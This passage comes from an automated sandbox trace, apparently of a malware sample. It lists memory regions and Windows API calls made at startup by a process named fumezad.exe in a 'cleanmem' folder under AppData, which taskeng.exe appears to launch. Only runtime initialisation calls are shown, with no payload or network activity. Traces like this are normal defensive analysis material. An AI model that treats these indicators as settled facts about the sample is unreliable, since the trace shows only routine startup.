0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4691 start_va = 0x370000 end_va = 0x39afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 4692 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4693 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4733 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Thread: id = 308 os_tid = 0xb2c [0201.620] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x1849b2d0, dwHighDateTime=0x1d4be3b)) [0201.620] GetCurrentThreadId () returned 0xb2c [0201.620] GetTickCount64 () returned 0x3d7c8 [0201.620] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1827899200000) returned 1 [0201.620] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x777dfd35, hStdError=0x77847daf)) [0201.621] GetCurrentThreadId () returned 0xb2c [0201.621] GetCommandLineA () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0201.621] GetEnvironmentStringsW () returned 0x511e50* [0201.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1284, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1284 [0201.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1284, lpMultiByteStr=0x512860, cbMultiByte=1284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1284 [0201.621] FreeEnvironmentStringsW (penv=0x511e50) returned 1 [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] GetACP () returned 0x4e4 [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] IsValidCodePage (CodePage=0x4e4) returned 1 [0201.621] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0201.621] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.621] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0201.621] GetLastError () returned 0x5 [0201.621] SetLastError (dwErrCode=0x5) [0201.621] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.622] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.622] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0201.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x1a\xd5\xc3\x8f\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0201.622] GetLastError () returned 0x5 [0201.622] SetLastError (dwErrCode=0x5) [0201.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0201.622] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.622] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0201.622] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x1a\xd5\xc3\x8f\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0201.622] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4768e0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.622] SetLastError (dwErrCode=0x0) [0201.622] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.623] SetLastError (dwErrCode=0x0) [0201.623] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.624] SetLastError (dwErrCode=0x0) [0201.624] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError 